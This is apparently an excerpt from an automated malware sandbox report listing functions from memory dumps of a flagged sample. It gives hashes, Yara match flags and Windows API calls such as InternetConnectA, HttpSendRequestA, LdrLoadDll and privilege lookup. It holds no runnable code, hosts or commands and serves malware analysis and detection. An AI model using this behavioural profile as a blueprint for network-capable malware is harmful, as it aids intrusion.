                            • Opcode ID: b32edffc2077d9c81d6d1df31221ce53e59b7ffe703da5d40a95b65234fa40c4
                            • Instruction ID: 03e6fb1fbdff696bb5946fc4df64762b2e78efe7305737461908c69a8120aabb
                            • Opcode Fuzzy Hash: b32edffc2077d9c81d6d1df31221ce53e59b7ffe703da5d40a95b65234fa40c4
                            • Instruction Fuzzy Hash: 59F030B1110149AFCB15DFA8DCC4CA7BBA9FF89250B15865DF95997206C630E815CBB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtClose.NTDLL(00DD3D40,?,?,00DD3D40,00000000,FFFFFFFF), ref: 00DD8325
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 646b8664b54510d6f9ea4daae5550fecc5c5074c317063d4aa48252de84d585b
                            • Instruction ID: 0c847045ca03063bcf8c73e76281c19d0f6d69fcaedd2ff72d6848ec77f7ab8e
                            • Opcode Fuzzy Hash: 646b8664b54510d6f9ea4daae5550fecc5c5074c317063d4aa48252de84d585b
                            • Instruction Fuzzy Hash: C7E0C232200318ABD710EFD4CC45E977768EF44710F004095BE189B382D530EA0087E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtClose.NTDLL(00DD3D40,?,?,00DD3D40,00000000,FFFFFFFF), ref: 00DD8325
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                            • Instruction ID: e8c8e2b91464229e7698d1a2b0675f417dc91f319f1aade5c8996fc633ae5b09
                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                            • Instruction Fuzzy Hash: 97D012752003146BD710EF98CC45E97775DEF44750F154455BA185B282C570F90086E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 19df72593f6c185a630af4486b270a311f5e10a1c9222d546ae7af946c3a245d
                            • Instruction ID: 79965724b16ef435e260c5fade9b0c8c3d47bfc50c40a555be766e3823bb3e87
                            • Opcode Fuzzy Hash: 19df72593f6c185a630af4486b270a311f5e10a1c9222d546ae7af946c3a245d
                            • Instruction Fuzzy Hash: C490047D711005031115F55D07445070057DFD53D13D1C431F1047550CD775CC717171
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: ce350a6e71cb6f19aef5868c963d6fe46aee0fc0e539f1cd37ba23ce1c374820
                            • Instruction ID: 0f464f05a267f07dc02d04a87654b99a42cf8f30484a672bdcb1a4b2e6780740
                            • Opcode Fuzzy Hash: ce350a6e71cb6f19aef5868c963d6fe46aee0fc0e539f1cd37ba23ce1c374820
                            • Instruction Fuzzy Hash: 309002A560200503511571594454616401A9BE0241B91C431E1045590DC56988917165
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 4631cefb5e53c82428cbf9f3cdc580506fc8b9974af17a2ffebedc12290c0a91
                            • Instruction ID: 6d88f2bdbc527ce541fcc9b63a54af0829e723ac0ae916e5bedd355966af348b
                            • Opcode Fuzzy Hash: 4631cefb5e53c82428cbf9f3cdc580506fc8b9974af17a2ffebedc12290c0a91
                            • Instruction Fuzzy Hash: 1E90027560100902E1106599544864600159BE0341F91D421A5055555EC6A988917171
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 8cfef71bc2e4ddf37b4bbd609c6dfea55a0ccae00a5a51b46f8fa8ff0d199873
                            • Instruction ID: 9dfe365f0f26c40896719175168982a1c94e4bc1b25b398117f0790258232981
                            • Opcode Fuzzy Hash: 8cfef71bc2e4ddf37b4bbd609c6dfea55a0ccae00a5a51b46f8fa8ff0d199873
                            • Instruction Fuzzy Hash: 1290026D61300502E1907159544860A00159BD1242FD1D825A0046558CC95988696361
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 5772cc91bca62677fa301ca5c491168eb29d81205e8cbcee5b92b2ca93b089d5
                            • Instruction ID: dae386b0863e990d42682f63e8e56e74215e4df8321c3c0396833be6ba8053e9
                            • Opcode Fuzzy Hash: 5772cc91bca62677fa301ca5c491168eb29d81205e8cbcee5b92b2ca93b089d5
                            • Instruction Fuzzy Hash: D990027571114902E1206159844470600159BD1241F91C821A0855558DC6D988917162
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 8045cef7c5caea84a3be50f26df948fe2c3508a5616f65c032fe3f248dcde81d
                            • Instruction ID: 1171d16205e26d0970ab14b9e18aaa5ba3fd11331ed35a551d2e1f4221a943e0
                            • Opcode Fuzzy Hash: 8045cef7c5caea84a3be50f26df948fe2c3508a5616f65c032fe3f248dcde81d
                            • Instruction Fuzzy Hash: D990027560100D02E1907159444464A00159BD1341FD1C425A0056654DCA598A5977E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 4149b0f3a4a4eddecff584c36d38cefa7026c7721178cfce23709031447e6fe4
                            • Instruction ID: 47d89847856a5f60468d0ecbe73a3a7330b9ab66e309ba05150a90c04cd2fb83
                            • Opcode Fuzzy Hash: 4149b0f3a4a4eddecff584c36d38cefa7026c7721178cfce23709031447e6fe4
                            • Instruction Fuzzy Hash: 4790027560504D42E15071594444A4600259BD0345F91C421A0095694DD6698D55B6A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 577007abd275dda7ef7e2fc43dd36984f86a9fe5884b161f5d4d06960397dc52
                            • Instruction ID: 12bbd645570a0425921c6e1963e287bfb76b67b02460ea333ee97cac4b172bf0
                            • Opcode Fuzzy Hash: 577007abd275dda7ef7e2fc43dd36984f86a9fe5884b161f5d4d06960397dc52
                            • Instruction Fuzzy Hash: 1E90027560108D02E1206159844474A00159BD0341F95C821A4455658DC6D988917161
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 142aa4790375ec5491b0bc35b788e3cd86f5a433614d0cb8459831045bc6eb06
                            • Instruction ID: 86f2788e4d915f3959e889f518acd55490897008c1de89119991699b7d93728e
                            • Opcode Fuzzy Hash: 142aa4790375ec5491b0bc35b788e3cd86f5a433614d0cb8459831045bc6eb06
                            • Instruction Fuzzy Hash: B690027560100D42E11061594444B4600159BE0341F91C426A0155654DC659C8517561
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 227ec0977c82ffec485c59c73c311d1eeae6f0906625c67bf9a5ac09b8911740
                            • Instruction ID: ac4cae72ab36ea8fc215af221c75643def396b655e4e5e8c446ef90016f85b21
                            • Opcode Fuzzy Hash: 227ec0977c82ffec485c59c73c311d1eeae6f0906625c67bf9a5ac09b8911740
                            • Instruction Fuzzy Hash: A49002B560100902E1507159444474600159BD0341F91C421A5095554EC69D8DD576A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: e9f94f7b310953612f4c37e0978f94f3692aecbe067289f0b06852a9e10e7d04
                            • Instruction ID: 6c05bce933a96b7ab7152d16a915da16e99df3d7ec7d87526f1a223e4dd0788b
                            • Opcode Fuzzy Hash: e9f94f7b310953612f4c37e0978f94f3692aecbe067289f0b06852a9e10e7d04
                            • Instruction Fuzzy Hash: BE9002A574100942E11061594454B060015DBE1341F91C425E1095554DC65DCC527166
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 9883d56e457e7f8de916c1058d751b84f07b02006bea709a39a422c13f2a30bd
                            • Instruction ID: 3b5b2bd39322067f137eee38022e2988c0bfad4fa27c38326435b8fd87d8866a
                            • Opcode Fuzzy Hash: 9883d56e457e7f8de916c1058d751b84f07b02006bea709a39a422c13f2a30bd
                            • Instruction Fuzzy Hash: A490027560100913E1216159454470700199BD0281FD1C822A0455558DD69A8952B161
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 69103050556ad365710e786dff40cc77a37c0ea4f145d5f4f77ca6d451f21779
                            • Instruction ID: 6d59f68536e10d777ca80202a9501a485d73aa80343bc57ba0c5a4141e9f8475
                            • Opcode Fuzzy Hash: 69103050556ad365710e786dff40cc77a37c0ea4f145d5f4f77ca6d451f21779
                            • Instruction Fuzzy Hash: 34900265642046526555B15944445074016ABE02817D1C422A1445950CC56A9856E661
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: a4d437fcff8c1f4df397567711c8b03ffb5b532078fff699371638dd889611a5
                            • Instruction ID: 4364e41accb385847584d35751212cf37ce7ee6e79ae9c6203a53c799fc4f784
                            • Opcode Fuzzy Hash: a4d437fcff8c1f4df397567711c8b03ffb5b532078fff699371638dd889611a5
                            • Instruction Fuzzy Hash: FF90026561180542E21065694C54B0700159BD0343F91C525A0185554CC95988616561
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00DD89BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: HttpRequestSend
                            • String ID: File$File$Http$HttpSendRequestA$Inte$InternetReadFile$Read$ReadFile$Requ$RequestA$Send$SendRequestA$estA$rnet$rnetReadFile
                            • API String ID: 360639707-3959710056
                            • Opcode ID: d5b9094f3cd13e19344bbfae1e4d624f5dccb206b88a28427ad4141f0228c73c
                            • Instruction ID: 85ef51703f22aacf6cfa7e57d9b2b8f905fcdf3806819325ecac736879f0fec3
                            • Opcode Fuzzy Hash: d5b9094f3cd13e19344bbfae1e4d624f5dccb206b88a28427ad4141f0228c73c
                            • Instruction Fuzzy Hash: 342115B1905259AFCB11DF98D941AAEBBB8EF54210F148189F9586B305D6709A10CBF2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00DD8847
                            • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00DD88C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: Internet$ConnectOpen
                            • String ID: Conn$ConnectA$Inte$InternetConnectA$InternetOpenA$ectA$rnet$rnetConnectA$rnetOpenA
                            • API String ID: 2790792615-445249611
                            • Opcode ID: 5fa68437addde2100cd29ac2d77750387b3ecb218cf6a2da5d17c425dedf5792
                            • Instruction ID: d419df915fb654c619440319bdaff7bc1566b0478d7171c8f3dd1552bbe53dd4
                            • Opcode Fuzzy Hash: 5fa68437addde2100cd29ac2d77750387b3ecb218cf6a2da5d17c425dedf5792
                            • Instruction Fuzzy Hash: CA11DAB2905119AFDB15DF98D940EEF77B9EB48310F098249BE09A7304C630EE10CBE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00DD8948
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: HttpOpenRequest
                            • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                            • API String ID: 1984915467-4016285707
                            • Opcode ID: 6c1eafa3af226a689b846ded80bf8f0a7dd1c2f620c7b46790f01cf217bfb4e9
                            • Instruction ID: aa5642c2f3ffb6deedae45df320e79e0fa4639595f4741f61f2e7dd69e194399
                            • Opcode Fuzzy Hash: 6c1eafa3af226a689b846ded80bf8f0a7dd1c2f620c7b46790f01cf217bfb4e9
                            • Instruction Fuzzy Hash: BB01D7B2905119ABCB04DF98D841DEF7BB9EB88210F158289FD48A7305D631AD108BE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00DD8948
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: HttpOpenRequest
                            • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                            • API String ID: 1984915467-4016285707
                            • Opcode ID: d69986c03cd36b082513b492e9fc0b569e989368efabb8b66ec8b3518b36aab6
                            • Instruction ID: d42e92186736cbd474520db6913f47f1115adf34ead691fdcb48f398c6d88422
                            • Opcode Fuzzy Hash: d69986c03cd36b082513b492e9fc0b569e989368efabb8b66ec8b3518b36aab6
                            • Instruction Fuzzy Hash: FB011BB2905149AFCB04DF98C945DEFBBB9FF49310F198299FD58A7205D630AA10CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00DD89BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: HttpRequestSend
                            • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                            • API String ID: 360639707-2503632690
                            • Opcode ID: 177ccb57ee224b759035b8d17f1308ad0ebf8aeb9cb95bc6b42b40d67c27329b
                            • Instruction ID: 8665552831c76ad518525c79a85c3a92c09736c3cf76a7ceaadc226282e37767
                            • Opcode Fuzzy Hash: 177ccb57ee224b759035b8d17f1308ad0ebf8aeb9cb95bc6b42b40d67c27329b
                            • Instruction Fuzzy Hash: 7F014BB2905118AFCB00DF98D841ABFBBB8EB48210F148189FD18A7304D671EE10CBF2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00DD89BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: HttpRequestSend
                            • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                            • API String ID: 360639707-2503632690
                            • Opcode ID: ae5b6745cc4f281a6e66eb45ae294286b5dfbd40b9538ef0a0963598aac513f8
                            • Instruction ID: 45a7a9d1055cd5ac158a98129686177d918e0d0ec6585263dcdc8151c286399b
                            • Opcode Fuzzy Hash: ae5b6745cc4f281a6e66eb45ae294286b5dfbd40b9538ef0a0963598aac513f8
                            • Instruction Fuzzy Hash: CF0128B2905259ABCB15CF98C881AEFBBB8EF58210F148189FD59A7305C7719A10CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00DD88C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: ConnectInternet
                            • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                            • API String ID: 3050416762-1024195942
                            • Opcode ID: 7ed34138f7708cf7613383558ca86b8bd00d3c79a0a04dd4c06582688efb1e76
                            • Instruction ID: 4806d1cca4afcaeac6acf689a6f8bc1d898d7fd72c9305c9fd2fcfcf4473246b
                            • Opcode Fuzzy Hash: 7ed34138f7708cf7613383558ca86b8bd00d3c79a0a04dd4c06582688efb1e76
                            • Instruction Fuzzy Hash: 8F01E9B2905118AFCB14DF99D941EEF77B9EB48310F158289FE08A7241D670EE10CBE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00DD8847
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: InternetOpen
                            • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                            • API String ID: 2038078732-3155091674
                            • Opcode ID: 883d24814d1d434d2a1ce25732a84b13edda96a210da1abb7f18c8cad43de92b
                            • Instruction ID: 88aeec23976d88fedb83c203e3b59336e705a711cfb3196bbdf365206c764f92
                            • Opcode Fuzzy Hash: 883d24814d1d434d2a1ce25732a84b13edda96a210da1abb7f18c8cad43de92b
                            • Instruction Fuzzy Hash: C3F019B2901218AF8B14DF98DC419EBB7BDEF48310B04858AFE18A7301D631AE108BE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00DD8847
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: InternetOpen
                            • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                            • API String ID: 2038078732-3155091674
                            • Opcode ID: c6843bea4c933d7574f54c9f46ec2b89ade053ec92b2d772f0569c440019f87d
                            • Instruction ID: 2213d1fe67d0d388edafc0b372487e762da4b084f77efc7ffc6b12441fd55418
                            • Opcode Fuzzy Hash: c6843bea4c933d7574f54c9f46ec2b89ade053ec92b2d772f0569c440019f87d
                            • Instruction Fuzzy Hash: 4C014BB2901118AF8B14DFA8DC45DEF7B79EF48310B148549FE18AB241D730AA10CBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • Sleep.KERNELBASE(000007D0), ref: 00DD6F98
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: net.dll$wininet.dll
                            • API String ID: 3472027048-1269752229
                            • Opcode ID: 9af03f7d8b8f3cb13721ec944da4d2b0e0be474876f60c5ffa2889f2ab7990b6
                            • Instruction ID: 17f6f81fa4732adbcd1ff6b744ae0be5f458fa112641660e3408ead4adf75f7b
                            • Opcode Fuzzy Hash: 9af03f7d8b8f3cb13721ec944da4d2b0e0be474876f60c5ffa2889f2ab7990b6
                            • Instruction Fuzzy Hash: 03314BB5601704ABC711DF68D8A1FA7B7B8EB48700F04851EF65AAB241D770B545CBF1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • Sleep.KERNELBASE(000007D0), ref: 00DD6F98
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: net.dll$wininet.dll
                            • API String ID: 3472027048-1269752229
                            • Opcode ID: 4c2a2ae1352936985be66b812d468caf95c2973c95d3259674e338bb2d96b5bf
                            • Instruction ID: 3a108483d484fd1c2b9d85b9e4fb874bcf7d21f6921f294beaa0a88377c787ee
                            • Opcode Fuzzy Hash: 4c2a2ae1352936985be66b812d468caf95c2973c95d3259674e338bb2d96b5bf
                            • Instruction Fuzzy Hash: 5F31CBB1605700ABD711DF68D8A1FAAB7B4EF88700F04802EF6596B281D370E945CBF5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00DC3B93), ref: 00DD850D
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID: .z`
                            • API String ID: 3298025750-1441809116
                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                            • Instruction ID: 3b0b6b685a1d9fe111a0da1115a08aebb9282e2253847e98672abd93a325ed38
                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                            • Instruction Fuzzy Hash: 01E01AB12002086BD714DF59CC45EA777ADEF88750F014555B90857281C630E9108AB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00DC3B93), ref: 00DD850D
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID: .z`
                            • API String ID: 3298025750-1441809116
                            • Opcode ID: 3ee11049d7c722ac33d182c222a893c0e6ee9b89d82a775565a4bd53ecf47ba5
                            • Instruction ID: 3d21a94fb8f3569763eff857727a73fc2e6dfbccdf20da2ad83d389391b1ab5d
                            • Opcode Fuzzy Hash: 3ee11049d7c722ac33d182c222a893c0e6ee9b89d82a775565a4bd53ecf47ba5
                            • Instruction Fuzzy Hash: CFE026B41002845FDB10EF58D8C08AB7795EF803147108A4AEC6847606C131D86A8BB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00DC72CA
                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00DC72EB
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID:
                            • API String ID: 1836367815-0
                            • Opcode ID: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
                            • Instruction ID: b20c9d37344602dc62bf0c899b1b5b06bbaa7bf7720def82303b7792a3a82614
                            • Opcode Fuzzy Hash: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
                            • Instruction Fuzzy Hash: E601D631A8022977E720A6949C43FFEB76C9F00F51F154119FF04BB2C1E6956A0687FA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,00DCCFB2,00DCCFB2,?,00000000,?,?), ref: 00DD8670
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: LookupPrivilegeValue
                            • String ID:
                            • API String ID: 3899507212-0
                            • Opcode ID: a8f0a5179ec3918f5198ae276a2bbff7539f31db9dc2293bf26dbcbc8b3ebc53
                            • Instruction ID: 34418f99c4cfe726ab8f38a7cfc4447734d5158078a24d1e81bf42e626a9af1d
                            • Opcode Fuzzy Hash: a8f0a5179ec3918f5198ae276a2bbff7539f31db9dc2293bf26dbcbc8b3ebc53
                            • Instruction Fuzzy Hash: 3001F9B52441442BD714DF95AC81DE77B98EF89660F04865EFD8D47243C830E405CB70
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00DC9BA2
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
